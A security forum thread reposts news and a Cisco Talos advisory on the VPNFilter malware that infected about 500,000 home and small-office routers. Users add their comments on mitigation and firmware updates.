Malware News VPNFilter Malware Infects 500k Routers Including Linksys, MikroTik, NETGEAR

[silversurfer]

Content source

https://threatpost.com/vpnfilter-malware-infects-500k-routers-including-linksys-mikrotik-netgear/132212/

Malware called VPNFilter has infected 500,000 router brands ranging from Linksys, MikroTik, NETGEAR and TP-Link that are mostly used in home offices. Researchers at Cisco Talos said they decided to warn the public of the threat despite the fact the infected devices and malware are still under investigation.

Researchers said their investigation into VPNFilter has been over the last several months and included both law enforcement and private-sector intelligence partners. “We have not completed our research, but recent events have convinced us that the correct way forward is to now share our findings so that affected parties can take the appropriate action to defend themselves,” researchers wrote in a Wednesday post.

Talos believes the attacks are being perpetrated by state-sponsored or state-affiliated actors and that an attack leveraging those compromised devices could be “imminent.” Researchers can’t say for sure who is behind VPNFilter, but say code used by the malware authors overlap with BlackEnergy malware used in previous attacks in the Ukraine. Currently, VPNFilter malware has been found mostly on devices in the Ukraine, but also in 54 additional countries.

“The behavior of this malware on networking equipment is particularly concerning, as components of the VPNFilter malware allows for theft of website credentials and monitoring of Modbus SCADA protocols,” researchers wrote.

Researchers said the malware has destructive capabilities that allow an attacker to either infect a device or render it unusable. “[This] can be triggered on individual victim machines or en masse, and has the potential of cutting off internet access for hundreds of thousands of victims worldwide,” the report stated.

More troubling to researchers, as of Thursday they “observed another substantial increase in newly acquired VPNFilter victims focused in Ukraine.”

The malware itself is multi-staged with phase one including VPNFilter targeting a number of CPU architectures of devices running firmware based on Busybox and Linux.

“The main purpose of these first-stage binaries is to locate a server providing a more fully featured second stage, and to download and maintain persistence for this next stage on infected devices,” Talos wrote.

Researchers said that this method of achieving persistence differs from other similar IoT malware such as Mirai. The Mirai malware could be removed from a device with a simple reboot. VPNFilter, on the other hand, “is capable of modifying non-volatile configuration memory values and adds itself to crontab, the Linux job scheduler, to achieve persistence,” according to the report.

After the malware has burrowed its way into a system’s memory, it begins to download an image from the image hosting site Photobucket, or from the domain toknowall[.]com as a backup. From the image downloaded, the malware extracts an IP address embedded in the image’s EXIF metadata that is used as a “listener” for the malware to receive instructions to initiate stage two.

“The stage 2 malware first sets up the working environment by creating a modules folder (/var/run/vpnfilterm) and a working directory (/var/run/vpnfilterw). Afterward, it will run in a loop, where it first reaches out to a C2 server, and then executes commands retrieved from the C2,” researchers wrote.

Malicious capabilities of VPNFilter include bricking the host device, executing shell commands for further manipulation, creating a ToR configuration for anonymous access to the device, or maliciously configuring the router’s proxy port and proxy URL to manipulate browsing sessions.

A third stage of the malware has also been observed where attackers leverage as many as two plugin modules – a packet sniffer and a communication plugin. Both leverage ToR to cloak communications. The packet sniffer module is capable of intercepting network traffic through a “raw socket” and looks for strings used in HTTP basic authentications. “This allows the attackers to understand, capture, and track the traffic flowing through the device,” researchers said.

Links made to the Russian-speaking actors with the BlackEnergy APT group were made when Cisco Talos researchers closely examined the malware’s encrypted binaries. “Analysis of this RC4 implementation shows that it is identical to the implementation used in BlackEnergy, which is believed by law enforcement agencies to originate with a state actor,” researchers stated.

“VPNFilter is an expansive, robust, highly capable, and dangerous threat that targets devices that are challenging to defend. Its highly modular framework allows for rapid changes to the actor’s operational infrastructure, serving their goals of misattribution, intelligence collection, and finding a platform to conduct attacks,” Talos researchers said.

 

[upnorth]

Cisco's Talos Intelligence Group Blog: New VPNFilter malware targets at least 500K networking devices worldwide

Defending against this threat is extremely difficult due to the nature of the affected devices. The majority of them are connected directly to the internet, with no security devices or services between them and the potential attackers. This challenge is augmented by the fact that most of the affected devices have publicly known vulnerabilities which are not convenient for the average user to patch. Additionally, most have no built-in anti-malware capabilities. These three facts together make this threat extremely hard to counter, resulting in extremely limited opportunities to interdict malware, remove vulnerabilities, or block threats.

Despite these challenges, Talos has released protections for this threat from multiple angles, to try to take advantage of the limited options that exist. We developed and deployed more than 100 Snort signatures for the publicly known vulnerabilities for the devices that are associated with this threat. These rules have been deployed in the public Snort set, and can be used by anyone to help defend their devices. In addition, we have done the usual blacklisting of domains/IPs as appropriate and convicting of the hashes associated with this threat to cover those who are protected by the Cisco Security ecosystem. We have reached out to Linksys, Mikrotik, Netgear, TP-Link and QNAP regarding this issue. (Note: QNAP has been aware of certain aspects of VPNFilter and previously done work to counter the threat.) Finally, we have also shared these indicators and our research with international law enforcement and our fellow members of the Cyber Threat Alliance in advance of this publication so they could move quickly to help counter this threat more broadly.

We recommend that:

• Users of SOHO routers and/or NAS devices reset them to factory defaults and reboot them in order to remove the potentially destructive, non-persistent stage 2 and stage 3 malware.
• Internet service providers that provide SOHO routers to their users reboot the routers on their customers' behalf.
• If you have any of the devices known or suspected to be affected by this threat, it is extremely important that you work with the manufacturer to ensure that your device is up to date with the latest patch versions. If not, you should apply the updated patches immediately.
• ISPs work aggressively with their customers to ensure their devices are patched to the most recent firmware/software versions.

Due to the potential for destructive action by the threat actor, we recommend out of an abundance of caution that these actions be taken for all SOHO or NAS devices, whether or not they are known to be affected by this threat.

The following devices are known to be affected by this threat. Based on the scale of this research, much of our observations are remote and not on the device, so it is difficult to determine specific version numbers and models in many cases. It should be noted that all of these devices have publicly known vulnerabilities associated with them.

Given our observations with this threat, we assess with high confidence that this list is incomplete and other devices could be affected.

LINKSYS DEVICES:

E1200
E2500
WRVS4400N

MIKROTIK ROUTEROS VERSIONS FOR CLOUD CORE ROUTERS:

1016
1036
1072

NETGEAR DEVICES:

DGN2200
R6400
R7000
R8000
WNR1000
WNR2000

QNAP DEVICES:

TS251
TS439 Pro

Other QNAP NAS devices running QTS software

TP-LINK DEVICES:

R600VPN

 

[Solarquest]

FBI seizes domain Russia allegedly used to infect 500,000 consumer routers


1st stage malware
VT 8/62

VirusTotal
7/62
VirusTotal

2nd stage malware
7/62
VirusTotal

6/59
VirusTotal
...
...

 

[ForgottenSeer 58943]

Those are all crap routers. Also, since they clearly allow user-space manipulation of the router VDOM controllers, they're even worse.

The fact these routers are HTTP/HTTPS WAN facing (Admin) is even more reckless. The most basic protection is to keep your router administration at the LAN level and if needed use a VPN to jack into your LAN from remote to access router admin. If the router has nothing facing the wan there is nothing for a malicious actor to hack. If the router protects it's user space and doesn't allow space execution, it's even harder (if not impossible) to hack.

So bad IT.. Poor quality hardware. In concert = Disaster.

 

[Vasudev]

Updated the firmware of my netgear router to fix the latest exploit.

 

[ForgottenSeer 69673]

Some internet providers tell their customers not to update the firmware because it will interfere with the service.

 

[ForgottenSeer 69673]

I checked my router and it has the latest firmware but am wondering if I should reflash it anyway?